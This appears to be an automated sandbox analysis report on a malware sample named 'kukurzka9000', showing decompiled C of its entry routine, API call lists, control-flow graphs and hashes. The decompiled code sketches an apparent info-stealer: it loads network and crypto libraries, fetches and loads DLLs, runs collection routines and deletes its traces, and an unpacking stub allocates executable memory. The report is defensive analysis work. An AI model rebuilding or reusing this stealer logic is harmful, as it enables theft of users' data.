407c26-407c27 FreeLibrary 252->254 255 407c2d-407c3e DeleteFileW 252->255 254->255 255->177
                                                                                                                                                                        C-Code - Quality: 59%
                                                                                                                                                                        			_entry_() {
                                                                                                                                                                        				WCHAR* _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				void* _v20;
                                                                                                                                                                        				void* _v24;
                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _v28;
                                                                                                                                                                        				char _v32;
                                                                                                                                                                        				struct HINSTANCE__* _v36;
                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _v40;
                                                                                                                                                                        				char _v44;
                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                        				intOrPtr _v60;
                                                                                                                                                                        				intOrPtr _v64;
                                                                                                                                                                        				char _v236;
                                                                                                                                                                        				intOrPtr _t72;
                                                                                                                                                                        				intOrPtr _t73;
                                                                                                                                                                        				intOrPtr _t74;
                                                                                                                                                                        				char _t77;
                                                                                                                                                                        				char _t78;
                                                                                                                                                                        				WCHAR* _t79;
                                                                                                                                                                        				void* _t80;
                                                                                                                                                                        				void* _t81;
                                                                                                                                                                        				void* _t83;
                                                                                                                                                                        				void* _t85;
                                                                                                                                                                        				void* _t87;
                                                                                                                                                                        				signed int _t95;
                                                                                                                                                                        				void* _t99;
                                                                                                                                                                        				void* _t100;
                                                                                                                                                                        				void* _t113;
                                                                                                                                                                        				void* _t117;
                                                                                                                                                                        				void* _t123;
                                                                                                                                                                        				void* _t124;
                                                                                                                                                                        				void* _t125;
                                                                                                                                                                        				void* _t126;
                                                                                                                                                                        				void* _t127;
                                                                                                                                                                        				void* _t128;
                                                                                                                                                                        				void* _t129;
                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _t140;
                                                                                                                                                                        				struct HINSTANCE__* _t156;
                                                                                                                                                                        				struct HINSTANCE__* _t159;
                                                                                                                                                                        				void* _t166;
                                                                                                                                                                        				void* _t181;
                                                                                                                                                                        				void* _t182;
                                                                                                                                                                        				char* _t184;
                                                                                                                                                                        				intOrPtr _t236;
                                                                                                                                                                        				intOrPtr _t238;
                                                                                                                                                                        				intOrPtr _t243;
                                                                                                                                                                        				intOrPtr _t244;
                                                                                                                                                                        				intOrPtr _t245;
                                                                                                                                                                        				intOrPtr _t246;
                                                                                                                                                                        				intOrPtr _t247;
                                                                                                                                                                        				void* _t258;
                                                                                                                                                                        				void* _t259;
                                                                                                                                                                        				WCHAR* _t260;
                                                                                                                                                                        				void* _t263;
                                                                                                                                                                        				void* _t264;
                                                                                                                                                                        				signed int _t265;
                                                                                                                                                                        				void* _t268;
                                                                                                                                                                        				struct HINSTANCE__* _t269;
                                                                                                                                                                        				void* _t271;
                                                                                                                                                                        				void* _t272;
                                                                                                                                                                        				void* _t273;
                                                                                                                                                                        				intOrPtr* _t276;
                                                                                                                                                                        				void* _t277;
                                                                                                                                                                        				intOrPtr* _t278;
                                                                                                                                                                        
                                                                                                                                                                        				E0040100B(); // executed
                                                                                                                                                                        				 *0x40e064(0);
                                                                                                                                                                        				_v24 = E0040A4C2("afb5c633c4650f69312baef49db9dfa4");
                                                                                                                                                                        				E00404027();
                                                                                                                                                                        				_t184 =  *0x40e04c;
                                                                                                                                                                        				_push(0x55);
                                                                                                                                                                        				_push( &_v236);
                                                                                                                                                                        				if( *_t184() == 0) {
                                                                                                                                                                        					L4:
                                                                                                                                                                        					_t260 = L"iqroq5112542785672901323";
                                                                                                                                                                        					_push(_t260);
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					_push(0x1f0001);
                                                                                                                                                                        					if( *((intOrPtr*)( *0x40e168))() != 0) {
                                                                                                                                                                        						ExitProcess(2); // executed
                                                                                                                                                                        					}
                                                                                                                                                                        					CreateMutexW(0, 0, _t260);
                                                                                                                                                                        					if(E0040A0BE() != 0) {
                                                                                                                                                                        						E0040A1FE();
                                                                                                                                                                        					}
                                                                                                                                                                        					_t72 = E00409FD3(0x40d998);
                                                                                                                                                                        					_t73 = E00409FD3("                                                                ");
                                                                                                                                                                        					_t74 = E00409FD3("                                                                ");
                                                                                                                                                                        					_v64 = _t72;
                                                                                                                                                                        					_v60 = _t73;
                                                                                                                                                                        					_v56 = _t74;
                                                                                                                                                                        					_v52 = E00409FD3("                                                                ");
                                                                                                                                                                        					_v48 = E00409FD3("                                                                ");
                                                                                                                                                                        					_t77 =  *0x40e314; // 0x61e8f8
                                                                                                                                                                        					_v32 = _t77;
                                                                                                                                                                        					_t78 =  *0x40e204; // 0x6587d8
                                                                                                                                                                        					_v28 = 0;
                                                                                                                                                                        					_v44 = _t78;
                                                                                                                                                                        					_v40 = 0;
                                                                                                                                                                        					_t79 = E00408619( &_v32);
                                                                                                                                                                        					 *_t278 = 0x1000;
                                                                                                                                                                        					_v8 = _t79;
                                                                                                                                                                        					_t80 =  *((intOrPtr*)( *0x40e044))(0x40, _t184);
                                                                                                                                                                        					_v20 = _t80;
                                                                                                                                                                        					_t81 =  *((intOrPtr*)( *0x40e044))(0x40, 0x618);
                                                                                                                                                                        					_t258 = E0040A5FA();
                                                                                                                                                                        					_t83 = E0040A672( *0x40e044);
                                                                                                                                                                        					_t181 = _t83;
                                                                                                                                                                        					_t85 = E0040A503( *((intOrPtr*)( *0x40e13c))(_t81,  *0x40e348), _t258);
                                                                                                                                                                        					_t236 =  *0x40e20c; // 0x658878
                                                                                                                                                                        					_t87 = E0040A503(E0040A503(_t85, _t236), _t181);
                                                                                                                                                                        					_t238 =  *0x40e308; // 0x649ef8
                                                                                                                                                                        					_t263 = E0040A503(E0040A503(_t87, _t238), _v24);
                                                                                                                                                                        					_v16 =  *((intOrPtr*)( *0x40e13c))(_v20, _t263);
                                                                                                                                                                        					LocalFree(_t258);
                                                                                                                                                                        					LocalFree(_t181);
                                                                                                                                                                        					LocalFree(_t263);
                                                                                                                                                                        					_t182 =  *((intOrPtr*)( *0x40e044))(0x40, 0x800);
                                                                                                                                                                        					_t95 = 0;
                                                                                                                                                                        					_v12 = 0;
                                                                                                                                                                        					while(1) {
                                                                                                                                                                        						_t264 = E0040A4C2( *((intOrPtr*)(_t277 + _t95 * 4 - 0x3c)));
                                                                                                                                                                        						_push(_t264);
                                                                                                                                                                        						if( *((short*)(_t264 +  *((intOrPtr*)( *0x40e08c))() * 2 - 2)) != 0x2f) {
                                                                                                                                                                        							_t264 = E0040A503(_t264, "/");
                                                                                                                                                                        						}
                                                                                                                                                                        						_t99 = E00407C62(_t264, _v16, _v8,  &_v44);
                                                                                                                                                                        						_t278 = _t278 + 0xc;
                                                                                                                                                                        						_t259 = _t99;
                                                                                                                                                                        						_t100 =  *((intOrPtr*)( *0x40e08c))(_t259);
                                                                                                                                                                        						_push(_t264);
                                                                                                                                                                        						if(_t100 >= 0x40) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						LocalFree();
                                                                                                                                                                        						if(_t259 == 0) {
                                                                                                                                                                        							LocalFree(_t259);
                                                                                                                                                                        						}
                                                                                                                                                                        						_t95 = _v12 + 1;
                                                                                                                                                                        						_v12 = _t95;
                                                                                                                                                                        						if(_t95 < 5) {
                                                                                                                                                                        							continue;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							L18:
                                                                                                                                                                        							LocalFree(_v8);
                                                                                                                                                                        							LocalFree(_v16);
                                                                                                                                                                        							_v8 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        							E0040A24A( &_v8);
                                                                                                                                                                        							if(_t259 == 0) {
                                                                                                                                                                        								L38:
                                                                                                                                                                        								LocalFree(_v8);
                                                                                                                                                                        								LocalFree(_t182);
                                                                                                                                                                        								ExitProcess(0);
                                                                                                                                                                        							}
                                                                                                                                                                        							E0040864C(_t259, _v8);
                                                                                                                                                                        							_t265 = 0;
                                                                                                                                                                        							_t113 =  *((intOrPtr*)( *0x40e18c))(_t259,  *0x40e418);
                                                                                                                                                                        							if(_t113 == 0) {
                                                                                                                                                                        								L21:
                                                                                                                                                                        								ExitProcess(0xffffffff);
                                                                                                                                                                        							}
                                                                                                                                                                        							_t265 = _t113 - _t259 >> 1;
                                                                                                                                                                        							_v12 =  *((intOrPtr*)( *0x40e044))(0x40, 0x100);
                                                                                                                                                                        							_t117 =  *((intOrPtr*)( *0x40e08c))(_t259);
                                                                                                                                                                        							_t37 = _t265 + 6; // 0x6
                                                                                                                                                                        							if(E0040A3E4(_t259,  &_v12, _t37, _t117) != 0) {
                                                                                                                                                                        								_t182 = E0040A503(_t182, _v12);
                                                                                                                                                                        								LocalFree(_v12);
                                                                                                                                                                        								_t123 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        								_t124 =  *((intOrPtr*)( *0x40e13c))(_t123, _v8);
                                                                                                                                                                        								_t243 =  *0x40e258; // 0x658558
                                                                                                                                                                        								_t125 = E0040A503(_t124, _t243);
                                                                                                                                                                        								_t244 =  *0x40e370; // 0x62dde8
                                                                                                                                                                        								_t126 = E0040A503(_t125, _t244);
                                                                                                                                                                        								_v20 = _t126;
                                                                                                                                                                        								_t127 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        								_t128 =  *((intOrPtr*)( *0x40e13c))(_t127, _v8);
                                                                                                                                                                        								_t245 =  *0x40e258; // 0x658558
                                                                                                                                                                        								_t129 = E0040A503(_t128, _t245);
                                                                                                                                                                        								_t246 =  *0x40e454; // 0x649e68
                                                                                                                                                                        								_v24 = E0040A503(_t129, _t246);
                                                                                                                                                                        								SetCurrentDirectoryW(_v8);
                                                                                                                                                                        								GetEnvironmentVariableW( *0x40e2e0,  *((intOrPtr*)( *0x40e044))(0x40, 0x5000), 0x2800);
                                                                                                                                                                        								_t247 =  *0x40e1e8; // 0x658678
                                                                                                                                                                        								_t220 = E0040A503(_t132, _t247);
                                                                                                                                                                        								_t268 = E0040A503(_t134, _v8);
                                                                                                                                                                        								SetEnvironmentVariableW( *0x40e2e0, _t268);
                                                                                                                                                                        								LocalFree(_t268);
                                                                                                                                                                        								E00409906(_t259, _t182);
                                                                                                                                                                        								_t140 =  *((intOrPtr*)( *0x40e034))(_v24);
                                                                                                                                                                        								_v28 = _t140;
                                                                                                                                                                        								if(_t140 != 0) {
                                                                                                                                                                        									E00403F9D(_t220, _t140, _t259, _t182);
                                                                                                                                                                        								}
                                                                                                                                                                        								_t269 =  *((intOrPtr*)( *0x40e034))(_v20);
                                                                                                                                                                        								_v36 = _t269;
                                                                                                                                                                        								if(_t269 != 0) {
                                                                                                                                                                        									_t166 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        									_v16 = _t166;
                                                                                                                                                                        									 *0x40e0c4(0, _t166, 0x1a, 0);
                                                                                                                                                                        									if(E004065D8(_t269) == 0) {
                                                                                                                                                                        										_t273 = _v16;
                                                                                                                                                                        									} else {
                                                                                                                                                                        										_t273 = _v16;
                                                                                                                                                                        										E0040633E(_t273, _t182, _t269, 0);
                                                                                                                                                                        									}
                                                                                                                                                                        									LocalFree(_t273);
                                                                                                                                                                        								}
                                                                                                                                                                        								E0040A7DA(_t182);
                                                                                                                                                                        								E0040ABD8(_t259, _t182);
                                                                                                                                                                        								E004055B6(_t182);
                                                                                                                                                                        								E00409BD9(_t259, _t182);
                                                                                                                                                                        								E00404F7E(_t259, _t182);
                                                                                                                                                                        								_v12 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t259) + _t149);
                                                                                                                                                                        								if(E00408A42(_t259,  &_v12) > 0) {
                                                                                                                                                                        									E00408ADD(_v12, _t182);
                                                                                                                                                                        								}
                                                                                                                                                                        								LocalFree(_v12);
                                                                                                                                                                        								E004073C7();
                                                                                                                                                                        								_t156 = _v36;
                                                                                                                                                                        								if(_t156 != 0) {
                                                                                                                                                                        									FreeLibrary(_t156);
                                                                                                                                                                        								}
                                                                                                                                                                        								_t271 = _v20;
                                                                                                                                                                        								DeleteFileW(_t271);
                                                                                                                                                                        								LocalFree(_t271);
                                                                                                                                                                        								_t159 = _v28;
                                                                                                                                                                        								if(_t159 != 0) {
                                                                                                                                                                        									FreeLibrary(_t159);
                                                                                                                                                                        								}
                                                                                                                                                                        								_t272 = _v24;
                                                                                                                                                                        								DeleteFileW(_t272);
                                                                                                                                                                        								LocalFree(_t272);
                                                                                                                                                                        								LocalFree(_t259);
                                                                                                                                                                        								goto L38;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								ExitProcess(0xfffffffe);
                                                                                                                                                                        							}
                                                                                                                                                                        							goto L21;
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					_t182 =  *((intOrPtr*)( *0x40e13c))(_t182);
                                                                                                                                                                        					LocalFree(_t264);
                                                                                                                                                                        					goto L18;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t276 = 0x40e4d8;
                                                                                                                                                                        				while(1) {
                                                                                                                                                                        					_push( *_t276);
                                                                                                                                                                        					_t184 =  &_v236;
                                                                                                                                                                        					_push(_t184);
                                                                                                                                                                        					if( *((intOrPtr*)( *0x40e170))() != 0) {
                                                                                                                                                                        						goto L4;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t276 = _t276 + 4;
                                                                                                                                                                        					if(_t276 != 0x40e4dc) {
                                                                                                                                                                        						continue;
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L4;
                                                                                                                                                                        				}
                                                                                                                                                                        				goto L4;
                                                                                                                                                                        			}






































































                                                                                                                                                                        0x0040777b
                                                                                                                                                                        0x00407783
                                                                                                                                                                        0x00407793
                                                                                                                                                                        0x00407796
                                                                                                                                                                        0x0040779b
                                                                                                                                                                        0x004077a7
                                                                                                                                                                        0x004077a9
                                                                                                                                                                        0x004077ae
                                                                                                                                                                        0x004077d4
                                                                                                                                                                        0x004077d9
                                                                                                                                                                        0x004077de
                                                                                                                                                                        0x004077df
                                                                                                                                                                        0x004077e0
                                                                                                                                                                        0x004077e9
                                                                                                                                                                        0x004077f8
                                                                                                                                                                        0x004077f8
                                                                                                                                                                        0x004077ee
                                                                                                                                                                        0x00407805
                                                                                                                                                                        0x00407807
                                                                                                                                                                        0x00407807
                                                                                                                                                                        0x00407812
                                                                                                                                                                        0x0040781e
                                                                                                                                                                        0x0040782a
                                                                                                                                                                        0x00407834
                                                                                                                                                                        0x00407837
                                                                                                                                                                        0x0040783a
                                                                                                                                                                        0x00407847
                                                                                                                                                                        0x0040784f
                                                                                                                                                                        0x00407855
                                                                                                                                                                        0x0040785a
                                                                                                                                                                        0x0040785d
                                                                                                                                                                        0x00407862
                                                                                                                                                                        0x00407865
                                                                                                                                                                        0x00407868
                                                                                                                                                                        0x0040786b
                                                                                                                                                                        0x00407876
                                                                                                                                                                        0x0040787f
                                                                                                                                                                        0x00407882
                                                                                                                                                                        0x00407891
                                                                                                                                                                        0x00407894
                                                                                                                                                                        0x0040789d
                                                                                                                                                                        0x0040789f
                                                                                                                                                                        0x004078b0
                                                                                                                                                                        0x004078b9
                                                                                                                                                                        0x004078be
                                                                                                                                                                        0x004078cf
                                                                                                                                                                        0x004078d4
                                                                                                                                                                        0x004078f1
                                                                                                                                                                        0x004078fa
                                                                                                                                                                        0x004078fd
                                                                                                                                                                        0x00407904
                                                                                                                                                                        0x0040790b
                                                                                                                                                                        0x00407920
                                                                                                                                                                        0x00407922
                                                                                                                                                                        0x00407924
                                                                                                                                                                        0x00407927
                                                                                                                                                                        0x00407936
                                                                                                                                                                        0x00407938
                                                                                                                                                                        0x00407941
                                                                                                                                                                        0x0040794f
                                                                                                                                                                        0x0040794f
                                                                                                                                                                        0x0040795d
                                                                                                                                                                        0x00407968
                                                                                                                                                                        0x0040796b
                                                                                                                                                                        0x0040796e
                                                                                                                                                                        0x00407970
                                                                                                                                                                        0x00407974
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407976
                                                                                                                                                                        0x0040797e
                                                                                                                                                                        0x00407981
                                                                                                                                                                        0x00407981
                                                                                                                                                                        0x0040798a
                                                                                                                                                                        0x0040798b
                                                                                                                                                                        0x00407991
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407993
                                                                                                                                                                        0x004079a6
                                                                                                                                                                        0x004079a9
                                                                                                                                                                        0x004079b2
                                                                                                                                                                        0x004079c9
                                                                                                                                                                        0x004079cc
                                                                                                                                                                        0x004079d3
                                                                                                                                                                        0x00407c45
                                                                                                                                                                        0x00407c48
                                                                                                                                                                        0x00407c4f
                                                                                                                                                                        0x00407c57
                                                                                                                                                                        0x00407c57
                                                                                                                                                                        0x004079de
                                                                                                                                                                        0x004079ee
                                                                                                                                                                        0x004079f1
                                                                                                                                                                        0x004079f5
                                                                                                                                                                        0x004079ff
                                                                                                                                                                        0x00407a01
                                                                                                                                                                        0x00407a01
                                                                                                                                                                        0x004079fb
                                                                                                                                                                        0x00407a15
                                                                                                                                                                        0x00407a1e
                                                                                                                                                                        0x00407a21
                                                                                                                                                                        0x00407a33
                                                                                                                                                                        0x00407a4a
                                                                                                                                                                        0x00407a4c
                                                                                                                                                                        0x00407a5f
                                                                                                                                                                        0x00407a6b
                                                                                                                                                                        0x00407a6d
                                                                                                                                                                        0x00407a75
                                                                                                                                                                        0x00407a7a
                                                                                                                                                                        0x00407a82
                                                                                                                                                                        0x00407a90
                                                                                                                                                                        0x00407a93
                                                                                                                                                                        0x00407a9f
                                                                                                                                                                        0x00407aa1
                                                                                                                                                                        0x00407aa9
                                                                                                                                                                        0x00407aae
                                                                                                                                                                        0x00407abe
                                                                                                                                                                        0x00407ac1
                                                                                                                                                                        0x00407ae4
                                                                                                                                                                        0x00407aea
                                                                                                                                                                        0x00407afa
                                                                                                                                                                        0x00407b01
                                                                                                                                                                        0x00407b0a
                                                                                                                                                                        0x00407b11
                                                                                                                                                                        0x00407b19
                                                                                                                                                                        0x00407b26
                                                                                                                                                                        0x00407b28
                                                                                                                                                                        0x00407b2d
                                                                                                                                                                        0x00407b33
                                                                                                                                                                        0x00407b39
                                                                                                                                                                        0x00407b44
                                                                                                                                                                        0x00407b46
                                                                                                                                                                        0x00407b4b
                                                                                                                                                                        0x00407b5a
                                                                                                                                                                        0x00407b63
                                                                                                                                                                        0x00407b66
                                                                                                                                                                        0x00407b75
                                                                                                                                                                        0x00407b8a
                                                                                                                                                                        0x00407b77
                                                                                                                                                                        0x00407b7a
                                                                                                                                                                        0x00407b81
                                                                                                                                                                        0x00407b87
                                                                                                                                                                        0x00407b8e
                                                                                                                                                                        0x00407b8e
                                                                                                                                                                        0x00407b98
                                                                                                                                                                        0x00407ba1
                                                                                                                                                                        0x00407baa
                                                                                                                                                                        0x00407bb3
                                                                                                                                                                        0x00407bbc
                                                                                                                                                                        0x00407bd6
                                                                                                                                                                        0x00407be5
                                                                                                                                                                        0x00407beb
                                                                                                                                                                        0x00407beb
                                                                                                                                                                        0x00407bf3
                                                                                                                                                                        0x00407bfb
                                                                                                                                                                        0x00407c00
                                                                                                                                                                        0x00407c05
                                                                                                                                                                        0x00407c08
                                                                                                                                                                        0x00407c08
                                                                                                                                                                        0x00407c0e
                                                                                                                                                                        0x00407c12
                                                                                                                                                                        0x00407c19
                                                                                                                                                                        0x00407c1f
                                                                                                                                                                        0x00407c24
                                                                                                                                                                        0x00407c27
                                                                                                                                                                        0x00407c27
                                                                                                                                                                        0x00407c2d
                                                                                                                                                                        0x00407c31
                                                                                                                                                                        0x00407c38
                                                                                                                                                                        0x00407c3f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407a35
                                                                                                                                                                        0x00407a37
                                                                                                                                                                        0x00407a37
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407a33
                                                                                                                                                                        0x00407991
                                                                                                                                                                        0x0040799e
                                                                                                                                                                        0x004079a0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004079a0
                                                                                                                                                                        0x004077b0
                                                                                                                                                                        0x004077b5
                                                                                                                                                                        0x004077b5
                                                                                                                                                                        0x004077bc
                                                                                                                                                                        0x004077c2
                                                                                                                                                                        0x004077c7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004077c9
                                                                                                                                                                        0x004077d2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004077d2
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040100B: LoadLibraryW.KERNEL32(kernel32.dll,?,?,00407780), ref: 00401016
                                                                                                                                                                          • Part of subcall function 0040100B: GetProcAddress.KERNEL32(00000000,LoadLibraryW), ref: 00401036
                                                                                                                                                                          • Part of subcall function 0040100B: LoadLibraryW.KERNELBASE(WinInet.dll,?,?,?,?,?,00407780), ref: 00401061
                                                                                                                                                                          • Part of subcall function 0040100B: LoadLibraryW.KERNELBASE(Crypt32.dll,?,?,?,?,?,00407780), ref: 00401091
                                                                                                                                                                          • Part of subcall function 0040100B: LoadLibraryW.KERNELBASE(Bcrypt.dll,?,?,?,?,?,00407780), ref: 004010AA
                                                                                                                                                                          • Part of subcall function 0040100B: GetProcAddress.KERNEL32(?,GetProcAddress), ref: 004010B8
                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00407783
                                                                                                                                                                          • Part of subcall function 0040A4C2: LocalAlloc.KERNEL32(00000040,?,?,?,00000000,00407793), ref: 0040A4E1
                                                                                                                                                                          • Part of subcall function 0040A4C2: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,afb5c633c4650f69312baef49db9dfa4,000000FF,00000000,00000000,?,?,?,00000000,00407793), ref: 0040A4F1
                                                                                                                                                                        • CreateMutexW.KERNEL32(00000000,00000000,iqroq5112542785672901323), ref: 004077EE
                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 004077F8
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004078FD
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00407904
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0040790B
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00407976
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00407981
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004079A0
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004079A9
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004079B2
                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00407A01
                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00407A37
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Local$Free$LibraryLoad$ExitProcess$AddressProc$AllocByteCharCreateInitializeMultiMutexWide
                                                                                                                                                                        • String ID: $ $ $ $afb5c633c4650f69312baef49db9dfa4$iqroq5112542785672901323$pXet
                                                                                                                                                                        • API String ID: 1492179042-3850438040
                                                                                                                                                                        • Opcode ID: 0a0d8b2567dfd511483fd131902667ad1f2beff92a239810d1cd299ce7c42da3
                                                                                                                                                                        • Instruction ID: e92a4b87a1a530e7256a75f8bb231f7b298302859da8ec0d9ad369049daf7dae
                                                                                                                                                                        • Opcode Fuzzy Hash: 0a0d8b2567dfd511483fd131902667ad1f2beff92a239810d1cd299ce7c42da3
                                                                                                                                                                        • Instruction Fuzzy Hash: 25D18571E00214ABDB04ABB6DE49E6E77B5AF48310B10483AF905B73D1DF78AD118B5E
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 257 239eb40-239eb8a VirtualProtect 258 239eb9d-239ec0e 257->258 259 239eb8c-239eb98 257->259 260 239ec31-239ec7c call 239e7a0 call 239e7e0 258->260 278 239ec10-239ec2e 258->278 259->260 267 239ec87-239ec91 260->267 269 239ecef-239ed41 call 239e920 267->269 270 239ec93-239ec9a 267->270 279 239ed6f-239ed76 269->279 280 239ed43-239ed47 269->280 272 239ec9c-239eca3 270->272 273 239ece4-239eced 270->273 272->273 276 239eca5-239ece1 call 239e7e0 272->276 273->267 276->273 278->260 284 239ed81-239ed8b 279->284 280->279 283 239ed49-239ed6c call 239e880 280->283 283->279 287 239eddd-239edf1 284->287 288 239ed8d-239ed94 284->288 290 239edd2-239eddb 288->290 291 239ed96-239ed9d 288->291 290->284 291->290 292 239ed9f-239edd0 call 239ee00 VirtualProtect 291->292 292->290
                                                                                                                                                                        APIs
                                                                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0239EB86
                                                                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0239EDD0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                                                        • Opcode ID: 6a4e5aa6d90b8b3ed13825a8e48c3be58f940a9f27a0826dba1cadd81984fabe
                                                                                                                                                                        • Instruction ID: e602e3a9a4753a3ebb2608d7a26f1cf690267355edf95b24403ed9862c9247d0
                                                                                                                                                                        • Opcode Fuzzy Hash: 6a4e5aa6d90b8b3ed13825a8e48c3be58f940a9f27a0826dba1cadd81984fabe
                                                                                                                                                                        • Instruction Fuzzy Hash: 10B19BB5A00209DFCB08CF88C895EAEBBB6FF88314F148559E9499B355D731E981CF94
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 296 239e620-239e66b call 239ea10 299 239e67a-239e6aa call 239e390 VirtualAlloc 296->299 300 239e66d-239e677 call 239ea10 296->300 300->299
                                                                                                                                                                        APIs
                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0239E6A4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                        • String ID: VirtualAlloc
                                                                                                                                                                        • API String ID: 4275171209-164498762
                                                                                                                                                                        • Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                                                                                                                        • Instruction ID: c9a148ccb5b1c8ff0f22976798532942dd046be84b2b8d468093ac9401e8d43c
                                                                                                                                                                        • Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                                                                                                                        • Instruction Fuzzy Hash: 8E113D70D08289EAEF01D7E88409BFFBFB55B12704F044098D5446A282D2BA57588BA6
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
